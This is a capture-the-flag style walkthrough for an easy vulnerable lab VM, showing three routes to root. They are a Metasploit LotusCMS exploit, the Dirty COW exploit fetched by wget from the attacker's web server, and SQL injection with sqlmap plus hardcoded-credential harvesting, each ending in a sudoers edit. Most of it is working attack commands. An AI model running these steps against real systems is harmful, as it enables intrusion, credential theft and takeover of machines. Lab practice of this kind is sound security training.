Machine Info:
- Difficulty: Easy
- Goal: Gain root access
Network Scanning
Netdiscover
As the previous times, we start running netdiscover to determine the target’s IP address through host-only adapter interface (eth1).
1
netdiscover -i eth1
Nmap
Then, we run nmap to scan all ports and discover open ports and services.
1
nmap -p- -A 192.168.56.118
Enumeration
Enumerating HTTP service
As a result of nmap, we found a couple of ports SSH:22 and HTTP:80. We start by HTTP service over port 80, so we go to the website to take a look what is going there.
We found an admin login page and this page is powered by LotusCMS. Therefore, let’s try to find any public exploits for that service “LotusCMS”.
Exploitation
We use searchsploit to search for any available exploits for “LotusCMS” or we can use our browser to search. We found 18565.rb which is part of metasploit framework.
1
searchsploit LotusCMS
We run msfconsole and search for “LotusCMS” then we use that found exploit, set the required parameters and run.
1
2
3
4
5
6
7
msfconsole
search LotusCMS
use 0
options
set RHOSTS 192.168.56.118
set URI /index.php?system=Admin
run
After running the exploit, we got a meterpreter shell then we open a shell terminal and promote it to tty shell (interactive shell). Now, we are in as a www-data user, so we need to privilege escalation.
1
2
3
4
sysinfo
shell
python -c 'import pty; pty.spawn("/bin/bash")'
id
Privilege Escalation
Method 1: Dirty COW
From the above image, we know that the target machine is running on linux kernel 2.6.24. Therefore, we use searchsploit to search for any public privilege escalation exploits for that version “2.6.24”. We found 40839.c which is an exploit uses the pokemon.c exploit of the dirtycow vulnerability as a base and generates a new passwd line. The user will be prompted for the new password when the binary is run. The original /etc/passwd file is then backed up to /tmp/passwd.bak and overwrites the root account with the generated line. After running the exploit you should be able to login with the newly created user. The created user called “firefart” by default, but you can modify it to any other username as you want.
We downloaded the exploit and uploaded it on a temporary web server using python in order to download it on the target machine.
1
2
3
4
# Kali linux terminal
searchsploit linux kernel 2.6.24 privilege escalation
searchsploit -m linux/local/40839.c
python -m SimpleHTTPServer
We download the exploit on the target machine and compile it then run it.
1
2
3
4
# target terminal
wget http://192.168.56.157:8000/40839.c
gcc -pthread 40839.c -o 40839 -lcrypt
./40839
And finally, we login to SSH with our new created user “firefart” and we successfully gained access to root shell.
1
2
3
4
# target terminal
ssh firefart@192.168.56.118
cat /etc/passwd
id
Method 2: phpmyadmin
After we got a www-data shell, we are looking for users on the target machine. We found two users “loneferret” and “dreg”.
1
tail /etc/passwd
Therefore, we go to each directory of them looking for anything seems to be interested. We got nothing at dreg’s directory but at loneferret’s directory we found “CompanyPolicy.README” file. We opened that file and we have an email sent from the CEO that informs loneferret about an installed software for editting, creating, and viewing files called “ht”. So, we need to find a way to escalate our privileges to loneferret user in order to use that software.
1
2
3
4
5
6
7
cd /home
ls
cd dreg
ls
cd ..; cd loneferret
ls
cat CompanyPolicy.README
We use the following find command to look for any hardcoded passwords and we found a mysql password “fuckeyou” that exists in “/home/www/kioptrix3.com/gallery/gconfig.php”.
1
find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null
We go to the gallery directory and read the gconfig.php file. And we found a gallery database credentials (username: root and password: fuckeyou).
1
2
cd /home/www/kioptrix3.com/gallery
cat gconfig.php
We run gobuster to make sure that there is a phpmyadmin directory on the target web server that we are going to use to login into mysql database.
1
gobuster dir --url http://192.168.56.118/ -w /usr/share/wordlists/dirb/common.txt
We go to phpmyadmin login page and enter our found credentials (root:fuckeyou).
After we logged in successfully, we go to gallery database then dev_accounts tables then click on browse tab and accordingly we found the users and their password hashes.
After that, we cracked the password hashes for both users by using crackstation website.
We successfully logged in to SSH as loneferret then we run the installed software “ht” with the sudo command.
1
2
3
4
5
6
7
ssh loneferret@192.168.56.118
id
pwd
ls
cat CompanyPolicy.README
export TERM=xterm
sudo ht
When the ht software open, we press on F3 button to enter the file that we want to edit. We enter the /etc/sudoers file that contains the users and applications that can be run as root.
We add “/bin/sh” at the end of loneferret line in order to be able to run “sh” and open a shell as root. Then we press on F10 button to save and exit.
Now, we run /bin/sh with sudo command and we got a root shell.
1
2
sudo /bin/sh
id
Method 3: sqlmap
We start from the point that we got a www-data shell. We run gobuster to find the available directories of the target website and we found /gallery that seems to be interested to us.
1
gobuster dir --url http://192.168.56.118/ -w /usr/share/wordlists/dirb/common.txt
Therefore, let’s go to the website to see how the gallery page looks like. But before we are going, we need to add the target IP address on our local /etc/hosts file to resolve the IP address to its domain name.
1
vi /etc/hosts
After editing the /etc/hosts file, here is the gallery page as depicted below. We click on Ligoat Press Room then from sorting options list we select photo id.
At the url, we have two parameters “id” and “sort”, we add single quote at id parameter and we noticed that it is injectable.
So, we run burp suite to intercept the request and save it to a file (for example, request.txt) in order to use that file with sqlmap later.
We open the request.txt file and add the asterisk at the parameter that we want to inject which is id in our case.
1
vi request.txt
We use sqlmap tool to automate the process of sql injection. We run the following command to dump the databases and we have found gallery database.
1
sqlmap -r request.txt --risk=3 --level=5 --dbs --batch
Then, we dump the tables of gallery database and the dev_accounts table seems to be interested to us.
1
sqlmap -r request.txt --risk=3 --level=5 -D gallery --tables --batch
Then, we dump the columns of the dev_accounts table and we got two users “dreg” and “loneferret” and their passwords.
1
sqlmap -r request.txt --risk=3 --level=5 -D gallery -T dev_accounts --dump --batch
And again as we did in method 2; We login to ssh as loneferret and run the installed software “ht” with sudo command.
1
2
3
4
5
6
7
ssh loneferret@192.168.56.118
id
ls
cat CompanyPolicy.README
sudo ht
export TERM=xterm
sudo ht
We press on F3 button and enter the file /etc/soduers to open. That file contains users and applications that can be run as root.
After the file is opened, we add /bin/sh at the end of loneferret line so we can run the shell terminal as root.
Now, we run /bin/sh with sudo command and we got a root shell.
